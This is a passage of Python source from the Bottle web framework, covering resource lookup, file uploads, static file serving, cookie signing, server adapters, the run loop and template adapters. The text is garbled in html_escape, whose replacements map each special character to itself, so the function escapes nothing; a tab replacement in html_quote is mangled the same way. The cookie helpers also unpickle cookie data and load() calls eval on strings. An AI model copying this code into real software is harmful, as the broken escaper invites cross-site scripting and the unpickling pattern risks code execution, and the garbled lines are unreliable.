depr('Attribute assignment is deprecated.') #0.12
if hasattr(dict, key):
raise AttributeError('Read-only attribute.')
if key in self and self[key] and isinstance(self[key], self.Namespace):
raise AttributeError('Non-empty namespace attribute.')
self[key] = value
def __delattr__(self, key):
if key in self:
val = self.pop(key)
if isinstance(val, self.Namespace):
prefix = key + '.'
for key in self:
if key.startswith(prefix):
del self[prefix+key]
def __call__(self, *a, **ka):
depr('Calling ConfDict is deprecated. Use the update() method.') #0.12
self.update(*a, **ka)
return self
class AppStack(list):
""" A stack-like list. Calling it returns the head of the stack. """
def __call__(self):
""" Return the current default application. """
return self[-1]
def push(self, value=None):
""" Add a new :class:`Bottle` instance to the stack """
if not isinstance(value, Bottle):
value = Bottle()
self.append(value)
return value
class WSGIFileWrapper(object):
def __init__(self, fp, buffer_size=1024*64):
self.fp, self.buffer_size = fp, buffer_size
for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'):
if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr))
def __iter__(self):
buff, read = self.buffer_size, self.read
while True:
part = read(buff)
if not part: return
yield part
class _closeiter(object):
''' This only exists to be able to attach a .close method to iterators that
do not support attribute assignment (most of itertools). '''
def __init__(self, iterator, close=None):
self.iterator = iterator
self.close_callbacks = makelist(close)
def __iter__(self):
return iter(self.iterator)
def close(self):
for func in self.close_callbacks:
func()
class ResourceManager(object):
''' This class manages a list of search paths and helps to find and open
application-bound resources (files).
:param base: default value for :meth:`add_path` calls.
:param opener: callable used to open resources.
:param cachemode: controls which lookups are cached. One of 'all',
'found' or 'none'.
'''
def __init__(self, base='./', opener=open, cachemode='all'):
self.opener = open
self.base = base
self.cachemode = cachemode
#: A list of search paths. See :meth:`add_path` for details.
self.path = []
#: A cache for resolved paths. ``res.cache.clear()`` clears the cache.
self.cache = {}
def add_path(self, path, base=None, index=None, create=False):
''' Add a new path to the list of search paths. Return False if the
path does not exist.
:param path: The new search path. Relative paths are turned into
an absolute and normalized form. If the path looks like a file
(not ending in `/`), the filename is stripped off.
:param base: Path used to absolutize relative search paths.
Defaults to :attr:`base` which defaults to ``os.getcwd()``.
:param index: Position within the list of search paths. Defaults
to last index (appends to the list).
The `base` parameter makes it easy to reference files installed
along with a python module or package::
res.add_path('./resources/', __file__)
'''
base = os.path.abspath(os.path.dirname(base or self.base))
path = os.path.abspath(os.path.join(base, os.path.dirname(path)))
path += os.sep
if path in self.path:
self.path.remove(path)
if create and not os.path.isdir(path):
os.makedirs(path)
if index is None:
self.path.append(path)
else:
self.path.insert(index, path)
self.cache.clear()
return os.path.exists(path)
def __iter__(self):
''' Iterate over all existing files in all registered paths. '''
search = self.path[:]
while search:
path = search.pop()
if not os.path.isdir(path): continue
for name in os.listdir(path):
full = os.path.join(path, name)
if os.path.isdir(full): search.append(full)
else: yield full
def lookup(self, name):
''' Search for a resource and return an absolute file path, or `None`.
The :attr:`path` list is searched in order. The first match is
returend. Symlinks are followed. The result is cached to speed up
future lookups. '''
if name not in self.cache or DEBUG:
for path in self.path:
fpath = os.path.join(path, name)
if os.path.isfile(fpath):
if self.cachemode in ('all', 'found'):
self.cache[name] = fpath
return fpath
if self.cachemode == 'all':
self.cache[name] = None
return self.cache[name]
def open(self, name, mode='r', *args, **kwargs):
''' Find a resource and return a file object, or raise IOError. '''
fname = self.lookup(name)
if not fname: raise IOError("Resource %r not found." % name)
return self.opener(fname, mode=mode, *args, **kwargs)
class FileUpload(object):
def __init__(self, fileobj, name, filename, headers=None):
''' Wrapper for file uploads. '''
#: Open file(-like) object (BytesIO buffer or temporary file)
self.file = fileobj
#: Name of the upload form field
self.name = name
#: Raw filename as sent by the client (may contain unsafe characters)
self.raw_filename = filename
#: A :class:`HeaderDict` with additional headers (e.g. content-type)
self.headers = HeaderDict(headers) if headers else HeaderDict()
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int, default=-1)
def get_header(self, name, default=None):
""" Return the value of a header within the mulripart part. """
return self.headers.get(name, default)
@cached_property
def filename(self):
''' Name of the file on the client file system, but normalized to ensure
file system compatibility. An empty filename is returned as 'empty'.
Only ASCII letters, digits, dashes, underscores and dots are
allowed in the final filename. Accents are removed, if possible.
Whitespace is replaced by a single dash. Leading or tailing dots
or dashes are removed. The filename is limited to 255 characters.
'''
fname = self.raw_filename
if not isinstance(fname, unicode):
fname = fname.decode('utf8', 'ignore')
fname = normalize('NFKD', fname).encode('ASCII', 'ignore').decode('ASCII')
fname = os.path.basename(fname.replace('\\', os.path.sep))
fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip()
fname = re.sub(r'[-\s]+', '-', fname).strip('.-')
return fname[:255] or 'empty'
def _copy_file(self, fp, chunk_size=2**16):
read, write, offset = self.file.read, fp.write, self.file.tell()
while 1:
buf = read(chunk_size)
if not buf: break
write(buf)
self.file.seek(offset)
def save(self, destination, overwrite=False, chunk_size=2**16):
''' Save file to disk or copy its content to an open file(-like) object.
If *destination* is a directory, :attr:`filename` is added to the
path. Existing files are not overwritten by default (IOError).
:param destination: File path, directory or file(-like) object.
:param overwrite: If True, replace existing files. (default: False)
:param chunk_size: Bytes to read at a time. (default: 64kb)
'''
if isinstance(destination, basestring): # Except file-likes here
if os.path.isdir(destination):
destination = os.path.join(destination, self.filename)
if not overwrite and os.path.exists(destination):
raise IOError('File exists.')
with open(destination, 'wb') as fp:
self._copy_file(fp, chunk_size)
else:
self._copy_file(destination, chunk_size)
###############################################################################
# Application Helper ###########################################################
###############################################################################
def abort(code=500, text='Unknown Error.'):
""" Aborts execution and causes a HTTP error. """
raise HTTPError(code, text)
def redirect(url, code=None):
""" Aborts execution and causes a 303 or 302 redirect, depending on
the HTTP protocol version. """
if not code:
code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302
res = response.copy(cls=HTTPResponse)
res.status = code
res.body = ""
res.set_header('Location', urljoin(request.url, url))
raise res
def _file_iter_range(fp, offset, bytes, maxread=1024*1024):
''' Yield chunks from a range in a file. No chunk is bigger than maxread.'''
fp.seek(offset)
while bytes > 0:
part = fp.read(min(bytes, maxread))
if not part: break
bytes -= len(part)
yield part
def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'):
""" Open a file in a safe way and return :exc:`HTTPResponse` with status
code 200, 305, 403 or 404. The ``Content-Type``, ``Content-Encoding``,
``Content-Length`` and ``Last-Modified`` headers are set if possible.
Special support for ``If-Modified-Since``, ``Range`` and ``HEAD``
requests.
:param filename: Name or path of the file to send.
:param root: Root path for file lookups. Should be an absolute directory
path.
:param mimetype: Defines the content-type header (default: guess from
file extension)
:param download: If True, ask the browser to open a `Save as...` dialog
instead of opening the file with the associated program. You can
specify a custom filename as a string. If not specified, the
original filename is used (default: False).
:param charset: The charset to use for files with a ``text/*``
mime-type. (default: UTF-8)
"""
root = os.path.abspath(root) + os.sep
filename = os.path.abspath(os.path.join(root, filename.strip('/\\')))
headers = dict()
if not filename.startswith(root):
return HTTPError(403, "Access denied.")
if not os.path.exists(filename) or not os.path.isfile(filename):
return HTTPError(404, "File does not exist.")
if not os.access(filename, os.R_OK):
return HTTPError(403, "You do not have permission to access this file.")
if mimetype == 'auto':
mimetype, encoding = mimetypes.guess_type(filename)
if encoding: headers['Content-Encoding'] = encoding
if mimetype:
if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype:
mimetype += '; charset=%s' % charset
headers['Content-Type'] = mimetype
if download:
download = os.path.basename(filename if download == True else download)
headers['Content-Disposition'] = 'attachment; filename="%s"' % download
stats = os.stat(filename)
headers['Content-Length'] = clen = stats.st_size
lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime))
headers['Last-Modified'] = lm
ims = request.environ.get('HTTP_IF_MODIFIED_SINCE')
if ims:
ims = parse_date(ims.split(";")[0].strip())
if ims is not None and ims >= int(stats.st_mtime):
headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
return HTTPResponse(status=304, **headers)
body = '' if request.method == 'HEAD' else open(filename, 'rb')
headers["Accept-Ranges"] = "bytes"
ranges = request.environ.get('HTTP_RANGE')
if 'HTTP_RANGE' in request.environ:
ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen))
if not ranges:
return HTTPError(416, "Requested Range Not Satisfiable")
offset, end = ranges[0]
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen)
headers["Content-Length"] = str(end-offset)
if body: body = _file_iter_range(body, offset, end-offset)
return HTTPResponse(body, status=206, **headers)
return HTTPResponse(body, **headers)
###############################################################################
# HTTP Utilities and MISC (TODO) ###############################################
###############################################################################
def debug(mode=True):
""" Change the debug level.
There is only one debug level supported at the moment."""
global DEBUG
if mode: warnings.simplefilter('default')
DEBUG = bool(mode)
def http_date(value):
if isinstance(value, (datedate, datetime)):
value = value.utctimetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
if not isinstance(value, basestring):
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
return value
def parse_date(ims):
""" Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """
try:
ts = email.utils.parsedate_tz(ims)
return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone
except (TypeError, ValueError, IndexError, OverflowError):
return None
def parse_auth(header):
""" Parse rfc2617 HTTP authentication header string (basic) and return (user,pass) tuple or None"""
try:
method, data = header.split(None, 1)
if method.lower() == 'basic':
user, pwd = touni(base64.b64decode(tob(data))).split(':',1)
return user, pwd
except (KeyError, ValueError):
return None
def parse_range_header(header, maxlen=0):
''' Yield (start, end) ranges parsed from a HTTP Range header. Skip
unsatisfiable ranges. The end index is non-inclusive.'''
if not header or header[:6] != 'bytes=': return
ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r]
for start, end in ranges:
try:
if not start: # bytes=-100 -> last 100 bytes
start, end = max(0, maxlen-int(end)), maxlen
elif not end: # bytes=100- -> all but the first 99 bytes
start, end = int(start), maxlen
else: # bytes=100-200 -> bytes 100-200 (inclusive)
start, end = int(start), min(int(end)+1, maxlen)
if 0 <= start < end <= maxlen:
yield start, end
except ValueError:
pass
def _parse_qsl(qs):
r = []
for pair in qs.replace(';','&').split('&'):
if not pair: continue
nv = pair.split('=', 1)
if len(nv) != 2: nv.append('')
key = urlunquote(nv[0].replace('+', ' '))
value = urlunquote(nv[1].replace('+', ' '))
r.append((key, value))
return r
def _lscmp(a, b):
''' Compares two strings in a cryptographically safe way:
Runtime is not affected by length of common prefix. '''
return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b)
def cookie_encode(data, key):
''' Encode and sign a pickle-able object. Return a (byte) string '''
msg = base64.b64encode(pickle.dumps(data, -1))
sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
return tob('!') + sig + tob('?') + msg
def cookie_decode(data, key):
''' Verify and decode an encoded string. Return an object or None.'''
data = tob(data)
if cookie_is_encoded(data):
sig, msg = data.split(tob('?'), 1)
if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
return pickle.loads(base64.b64decode(msg))
return None
def cookie_is_encoded(data):
''' Return True if the argument looks like a encoded cookie.'''
return bool(data.startswith(tob('!')) and tob('?') in data)
def html_escape(string):
''' Escape HTML special characters ``&<>`` and quotes ``'"``. '''
return string.replace('&','&').replace('<','<').replace('>','>')\
.replace('"','"').replace("'",''')
def html_quote(string):
''' Escape and quote a string to be used as an HTTP attribute.'''
return '"%s"' % html_escape(string).replace('\n',' ')\
.replace('\r',' ').replace('\t','	')
def yieldroutes(func):
""" Return a generator for routes that match the signature (name, args)
of the func parameter. This may yield more than one route if the function
takes optional keyword arguments. The output is best described by example::
a() -> '/a'
b(x, y) -> '/b/<x>/<y>'
c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>'
d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>'
"""
path = '/' + func.__name__.replace('__','/').lstrip('/')
spec = getargspec(func)
argc = len(spec[0]) - len(spec[3] or [])
path += ('/<%s>' * argc) % tuple(spec[0][:argc])
yield path
for arg in spec[0][argc:]:
path += '/<%s>' % arg
yield path
def path_shift(script_name, path_info, shift=1):
''' Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa.
:return: The modified paths.
:param script_name: The SCRIPT_NAME path.
:param script_name: The PATH_INFO path.
:param shift: The number of path fragments to shift. May be negative to
change the shift direction. (default: 1)
'''
if shift == 0: return script_name, path_info
pathlist = path_info.strip('/').split('/')
scriptlist = script_name.strip('/').split('/')
if pathlist and pathlist[0] == '': pathlist = []
if scriptlist and scriptlist[0] == '': scriptlist = []
if shift > 0 and shift <= len(pathlist):
moved = pathlist[:shift]
scriptlist = scriptlist + moved
pathlist = pathlist[shift:]
elif shift < 0 and shift >= -len(scriptlist):
moved = scriptlist[shift:]
pathlist = moved + pathlist
scriptlist = scriptlist[:shift]
else:
empty = 'SCRIPT_NAME' if shift < 0 else 'PATH_INFO'
raise AssertionError("Cannot shift. Nothing left from %s" % empty)
new_script_name = '/' + '/'.join(scriptlist)
new_path_info = '/' + '/'.join(pathlist)
if path_info.endswith('/') and pathlist: new_path_info += '/'
return new_script_name, new_path_info
def auth_basic(check, realm="private", text="Access denied"):
''' Callback decorator to require HTTP auth (basic).
TODO: Add route(check_auth=...) parameter. '''
def decorator(func):
def wrapper(*a, **ka):
user, password = request.auth or (None, None)
if user is None or not check(user, password):
err = HTTPError(401, text)
err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm)
return err
return func(*a, **ka)
return wrapper
return decorator
# Shortcuts for common Bottle methods.
# They all refer to the current default application.
def make_default_app_wrapper(name):
''' Return a callable that relays calls to the current default app. '''
@functools.wraps(getattr(Bottle, name))
def wrapper(*a, **ka):
return getattr(app(), name)(*a, **ka)
return wrapper
route = make_default_app_wrapper('route')
get = make_default_app_wrapper('get')
post = make_default_app_wrapper('post')
put = make_default_app_wrapper('put')
delete = make_default_app_wrapper('delete')
error = make_default_app_wrapper('error')
mount = make_default_app_wrapper('mount')
hook = make_default_app_wrapper('hook')
install = make_default_app_wrapper('install')
uninstall = make_default_app_wrapper('uninstall')
url = make_default_app_wrapper('get_url')
###############################################################################
# Server Adapter ###############################################################
###############################################################################
class ServerAdapter(object):
quiet = False
def __init__(self, host='127.0.0.1', port=8080, **options):
self.options = options
self.host = host
self.port = int(port)
def run(self, handler): # pragma: no cover
pass
def __repr__(self):
args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()])
return "%s(%s)" % (self.__class__.__name__, args)
class CGIServer(ServerAdapter):
quiet = True
def run(self, handler): # pragma: no cover
from wsgiref.handlers import CGIHandler
def fixed_environ(environ, start_response):
environ.setdefault('PATH_INFO', '')
return handler(environ, start_response)
CGIHandler().run(fixed_environ)
class FlupFCGIServer(ServerAdapter):
def run(self, handler): # pragma: no cover
import flup.server.fcgi
self.options.setdefault('bindAddress', (self.host, self.port))
flup.server.fcgi.WSGIServer(handler, **self.options).run()
class WSGIRefServer(ServerAdapter):
def run(self, app): # pragma: no cover
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
srv = make_server(self.host, self.port, app, server_cls, handler_cls)
srv.serve_forever()
class CherryPyServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from cherrypy import wsgiserver
self.options['bind_addr'] = (self.host, self.port)
self.options['wsgi_app'] = handler
certfile = self.options.get('certfile')
if certfile:
del self.options['certfile']
keyfile = self.options.get('keyfile')
if keyfile:
del self.options['keyfile']
server = wsgiserver.CherryPyWSGIServer(**self.options)
if certfile:
server.ssl_certificate = certfile
if keyfile:
server.ssl_private_key = keyfile
try:
server.start()
finally:
server.stop()
class WaitressServer(ServerAdapter):
def run(self, handler):
from waitress import serve
serve(handler, host=self.host, port=self.port)
class PasteServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from paste import httpserver
from paste.translogger import TransLogger
handler = TransLogger(handler, setup_console_handler=(not self.quiet))
httpserver.serve(handler, host=self.host, port=str(self.port),
**self.options)
class MeinheldServer(ServerAdapter):
def run(self, handler):
from meinheld import server
server.listen((self.host, self.port))
server.run(handler)
class FapwsServer(ServerAdapter):
""" Extremely fast webserver using libev. See http://www.fapws.org/ """
def run(self, handler): # pragma: no cover
import fapws._evwsgi as evwsgi
from fapws import base, config
port = self.port
if float(config.SERVER_IDENT[-2:]) > 0.4:
# fapws3 silently changed its API in 0.5
port = str(port)
evwsgi.start(self.host, port)
# fapws3 never releases the GIL. Complain upstream. I tried. No luck.
if 'BOTTLE_CHILD' in os.environ and not self.quiet:
_stderr("WARNING: Auto-reloading does not work with Fapws3.\n")
_stderr(" (Fapws3 breaks python thread support)\n")
evwsgi.set_base_module(base)
def app(environ, start_response):
environ['wsgi.multiprocess'] = False
return handler(environ, start_response)
evwsgi.wsgi_cb(('', app))
evwsgi.run()
class TornadoServer(ServerAdapter):
""" The super hyped asynchronous server by facebook. Untested. """
def run(self, handler): # pragma: no cover
import tornado.wsgi, tornado.httpserver, tornado.ioloop
container = tornado.wsgi.WSGIContainer(handler)
server = tornado.httpserver.HTTPServer(container)
server.listen(port=self.port,address=self.host)
tornado.ioloop.IOLoop.instance().start()
class AppEngineServer(ServerAdapter):
""" Adapter for Google App Engine. """
quiet = True
def run(self, handler):
from google.appengine.ext.webapp import util
# A main() function in the handler script enables 'App Caching'.
# Lets makes sure it is there. This _really_ improves performance.
module = sys.modules.get('__main__')
if module and not hasattr(module, 'main'):
module.main = lambda: util.run_wsgi_app(handler)
util.run_wsgi_app(handler)
class TwistedServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from twisted.web import server, wsgi
from twisted.python.threadpool import ThreadPool
from twisted.internet import reactor
thread_pool = ThreadPool()
thread_pool.start()
reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop)
factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler))
reactor.listenTCP(self.port, factory, interface=self.host)
reactor.run()
class DieselServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from diesel.protocols.wsgi import WSGIApplication
app = WSGIApplication(handler, port=self.port)
app.run()
class GeventServer(ServerAdapter):
""" Untested. Options:
* `fast` (default: False) uses libevent's http server, but has some
issues: No streaming, no pipelining, no SSL.
* See gevent.wsgi.WSGIServer() documentation for more options.
"""
def run(self, handler):
from gevent import pywsgi, local
if not isinstance(threading.local(), local.local):
msg = "Bottle requires gevent.monkey.patch_all() (before import)"
raise RuntimeError(msg)
if self.options.pop('fast', None):
depr('The "fast" option has been deprecated and removed by Gevent.')
if self.quiet:
self.options['log'] = None
address = (self.host, self.port)
server = pywsgi.WSGIServer(address, handler, **self.options)
if 'BOTTLE_CHILD' in os.environ:
import signal
signal.signal(signal.SIGINT, lambda s, f: server.stop())
server.serve_forever()
class GeventSocketIOServer(ServerAdapter):
def run(self,handler):
from socketio import server
address = (self.host, self.port)
server.SocketIOServer(address, handler, **self.options).serve_forever()
class GunicornServer(ServerAdapter):
""" Untested. See http://gunicorn.org/configure.html for options. """
def run(self, handler):
from gunicorn.app.base import Application
config = {'bind': "%s:%d" % (self.host, int(self.port))}
config.update(self.options)
class GunicornApplication(Application):
def init(self, parser, opts, args):
return config
def load(self):
return handler
GunicornApplication().run()
class EventletServer(ServerAdapter):
""" Untested """
def run(self, handler):
from eventlet import wsgi, listen
try:
wsgi.server(listen((self.host, self.port)), handler,
log_output=(not self.quiet))
except TypeError:
# Fallback, if we have old version of eventlet
wsgi.server(listen((self.host, self.port)), handler)
class RocketServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from rocket import Rocket
server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler })
server.start()
class BjoernServer(ServerAdapter):
""" Fast server written in C: https://github.com/jonashaag/bjoern """
def run(self, handler):
from bjoern import run
run(handler, self.host, self.port)
class AutoServer(ServerAdapter):
""" Untested. """
adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer]
def run(self, handler):
for sa in self.adapters:
try:
return sa(self.host, self.port, **self.options).run(handler)
except ImportError:
pass
server_names = {
'cgi': CGIServer,
'flup': FlupFCGIServer,
'wsgiref': WSGIRefServer,
'waitress': WaitressServer,
'cherrypy': CherryPyServer,
'paste': PasteServer,
'fapws3': FapwsServer,
'tornado': TornadoServer,
'gae': AppEngineServer,
'twisted': TwistedServer,
'diesel': DieselServer,
'meinheld': MeinheldServer,
'gunicorn': GunicornServer,
'eventlet': EventletServer,
'gevent': GeventServer,
'geventSocketIO':GeventSocketIOServer,
'rocket': RocketServer,
'bjoern' : BjoernServer,
'auto': AutoServer,
}
###############################################################################
# Application Control ##########################################################
###############################################################################
def load(target, **namespace):
""" Import a module or fetch an object from a module.
* ``package.module`` returns `module` as a module object.
* ``pack.mod:name`` returns the module variable `name` from `pack.mod`.
* ``pack.mod:func()`` calls `pack.mod.func()` and returns the result.
The last form accepts not only function calls, but any type of
expression. Keyword arguments passed to this function are available as
local variables. Example: ``import_string('re:compile(x)', x='[a-z]')``
"""
module, target = target.split(":", 1) if ':' in target else (target, None)
if module not in sys.modules: __import__(module)
if not target: return sys.modules[module]
if target.isalnum(): return getattr(sys.modules[module], target)
package_name = module.split('.')[0]
namespace[package_name] = sys.modules[package_name]
return eval('%s.%s' % (module, target), namespace)
def load_app(target):
""" Load a bottle application from a module and make sure that the import
does not affect the current default application, but returns a separate
application object. See :func:`load` for the target parameter. """
global NORUN; NORUN, nr_old = True, NORUN
try:
tmp = default_app.push() # Create a new "default application"
rv = load(target) # Import the target module
return rv if callable(rv) else tmp
finally:
default_app.remove(tmp) # Remove the temporary added default application
NORUN = nr_old
_debug = debug
def run(app=None, server='wsgiref', host='127.0.0.1', port=8080,
interval=1, reloader=False, quiet=False, plugins=None,
debug=None, **kargs):
""" Start a server instance. This method blocks until the server terminates.
:param app: WSGI application or target string supported by
:func:`load_app`. (default: :func:`default_app`)
:param server: Server adapter to use. See :data:`server_names` keys
for valid names or pass a :class:`ServerAdapter` subclass.
(default: `wsgiref`)
:param host: Server address to bind to. Pass ``0.0.0.0`` to listens on
all interfaces including the external one. (default: 127.0.0.1)
:param port: Server port to bind to. Values below 1024 require root
privileges. (default: 8080)
:param reloader: Start auto-reloading server? (default: False)
:param interval: Auto-reloader interval in seconds (default: 1)
:param quiet: Suppress output to stdout and stderr? (default: False)
:param options: Options passed to the server adapter.
"""
if NORUN: return
if reloader and not os.environ.get('BOTTLE_CHILD'):
try:
lockfile = None
fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock')
os.close(fd) # We only need this file to exist. We never write to it
while os.path.exists(lockfile):
args = [sys.executable] + sys.argv
environ = os.environ.copy()
environ['BOTTLE_CHILD'] = 'true'
environ['BOTTLE_LOCKFILE'] = lockfile
p = subprocess.Popen(args, env=environ)
while p.poll() is None: # Busy wait...
os.utime(lockfile, None) # I am alive!
time.sleep(interval)
if p.poll() != 3:
if os.path.exists(lockfile): os.unlink(lockfile)
sys.exit(p.poll())
except KeyboardInterrupt:
pass
finally:
if os.path.exists(lockfile):
os.unlink(lockfile)
return
try:
if debug is not None: _debug(debug)
app = app or default_app()
if isinstance(app, basestring):
app = load_app(app)
if not callable(app):
raise ValueError("Application is not callable: %r" % app)
for plugin in plugins or []:
app.install(plugin)
if server in server_names:
server = server_names.get(server)
if isinstance(server, basestring):
server = load(server)
if isinstance(server, type):
server = server(host=host, port=port, **kargs)
if not isinstance(server, ServerAdapter):
raise ValueError("Unknown or unsupported server: %r" % server)
server.quiet = server.quiet or quiet
if not server.quiet:
_stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server)))
_stderr("Listening on http://%s:%d/\n" % (server.host, server.port))
_stderr("Hit Ctrl-C to quit.\n\n")
if reloader:
lockfile = os.environ.get('BOTTLE_LOCKFILE')
bgcheck = FileCheckerThread(lockfile, interval)
with bgcheck:
server.run(app)
if bgcheck.status == 'reload':
sys.exit(3)
else:
server.run(app)
except KeyboardInterrupt:
pass
except (SystemExit, MemoryError):
raise
except:
if not reloader: raise
if not getattr(server, 'quiet', quiet):
print_exc()
time.sleep(interval)
sys.exit(3)
class FileCheckerThread(threading.Thread):
''' Interrupt main-thread as soon as a changed module file is detected,
the lockfile gets deleted or gets to old. '''
def __init__(self, lockfile, interval):
threading.Thread.__init__(self)
self.lockfile, self.interval = lockfile, interval
#: Is one of 'reload', 'error' or 'exit'
self.status = None
def run(self):
exists = os.path.exists
mtime = lambda path: os.stat(path).st_mtime
files = dict()
for module in list(sys.modules.values()):
path = getattr(module, '__file__', '') or ''
if path[-4:] in ('.pyo', '.pyc'): path = path[:-1]
if path and exists(path): files[path] = mtime(path)
while not self.status:
if not exists(self.lockfile)\
or mtime(self.lockfile) < time.time() - self.interval - 5:
self.status = 'error'
thread.interrupt_main()
for path, lmtime in list(files.items()):
if not exists(path) or mtime(path) > lmtime:
self.status = 'reload'
thread.interrupt_main()
break
time.sleep(self.interval)
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.status: self.status = 'exit' # silent exit
self.join()
return exc_type is not None and issubclass(exc_type, KeyboardInterrupt)
###############################################################################
# Template Adapters ############################################################
###############################################################################
class TemplateError(HTTPError):
def __init__(self, message):
HTTPError.__init__(self, 500, message)
class BaseTemplate(object):
""" Base class and minimal API for template adapters """
extensions = ['tpl','html','thtml','stpl']
settings = {} #used in prepare()
defaults = {} #used in render()
def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings):
""" Create a new template.
If the source parameter (str or buffer) is missing, the name argument
is used to guess a template filename. Subclasses can assume that
self.source and/or self.filename are set. Both are strings.
The lookup, encoding and settings parameters are stored as instance
variables.
The lookup parameter stores a list containing directory paths.
The encoding parameter should be used to decode byte strings or files.
The settings parameter contains a dict for engine-specific settings.
"""
self.name = name
self.source = source.read() if hasattr(source, 'read') else source
self.filename = source.filename if hasattr(source, 'filename') else None
self.lookup = [os.path.abspath(x) for x in lookup]
self.encoding = encoding
self.settings = self.settings.copy() # Copy from class variable
self.settings.update(settings) # Apply
if not self.source and self.name:
self.filename = self.search(self.name, self.lookup)
if not self.filename:
raise TemplateError('Template %s not found.' % repr(name))
if not self.source and not self.filename:
raise TemplateError('No template specified.')
self.prepare(**self.settings)
@classmethod
def search(cls, name, lookup=[]):
""" Search name in all directories specified in lookup.
First without, then with common extensions. Return first hit. """
if not lookup:
depr('The template lookup path list should not be empty.') #0.12
lookup = ['.']
if os.path.isabs(name) and os.path.isfile(name):
depr('Absolute template path names are deprecated.') #0.12
return os.path.abspath(name)
for spath in lookup:
spath = os.path.abspath(spath) + os.sep
fname = os.path.abspath(os.path.join(spath, name))
if not fname.startswith(spath): continue
if os.path.isfile(fname): return fname
for ext in cls.extensions:
if os.path.isfile('%s.%s' % (fname, ext)):
return '%s.%s' % (fname, ext)
@classmethod
def global_config(cls, key, *args):
''' This reads or sets the global settings stored in class.settings. '''
if args:
cls.settings = cls.settings.copy() # Make settings local to class
cls.settings[key] = args[0]
else:
return cls.settings[key]
def prepare(self, **options):
""" Run preparations (parsing, caching, ...).
It should be possible to call this again to refresh a template or to
update settings.
"""
raise NotImplementedError
def render(self, *args, **kwargs):
""" Render the template with the specified local variables and return
a single byte or unicode string. If it is a byte string, the encoding
must match self.encoding. This method must be thread-safe!
Local variables may be provided in dictionaries (args)
or directly, as keywords (kwargs).
"""
raise NotImplementedError
class MakoTemplate(BaseTemplate):
def prepare(self, **options):
from mako.template import Template
from mako.lookup import TemplateLookup
options.update({'input_encoding':self.encoding})
options.setdefault('format_exceptions', bool(DEBUG))
lookup = TemplateLookup(directories=self.lookup, **options)
if self.source:
self.tpl = Template(self.source, lookup=lookup, **options)
else:
self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
class CheetahTemplate(BaseTemplate):
def prepare(self, **options):
from Cheetah.Template import Template
self.context = threading.local()
self.context.vars = {}
options['searchList'] = [self.context.vars]
if self.source:
self.tpl = Template(source=self.source, **options)
else:
self.tpl = Template(file=self.filename, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
self.context.vars.update(self.defaults)
self.context.vars.update(kwargs)
out = str(self.tpl)
self.context.vars.clear()
return out
class Jinja2Template(BaseTemplate):
def prepare(self, filters=None, tests=None, globals={}, **kwargs):
from jinja2 import Environment, FunctionLoader
if 'prefix' in kwargs: # TODO: to be removed after a while
raise RuntimeError('The keyword argument `prefix` has been removed. '
'Use the full jinja2 environment name line_statement_prefix instead.')
self.env = Environment(loader=FunctionLoader(self.loader), **kwargs)
if filters: self.env.filters.update(filters)
if tests: self.env.tests.update(tests)
if globals: self.env.globals.update(globals)
if self.source:
self.tpl = self.env.from_string(self.source)
else:
self.tpl = self.env.get_template(self.filename)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
def loader(self, name):
fname = self.search(name, self.lookup)
if not fname: return
with open(fname, "rb") as f:
return f.read().decode(self.encoding)
class SimpleTemplate(BaseTemplate):
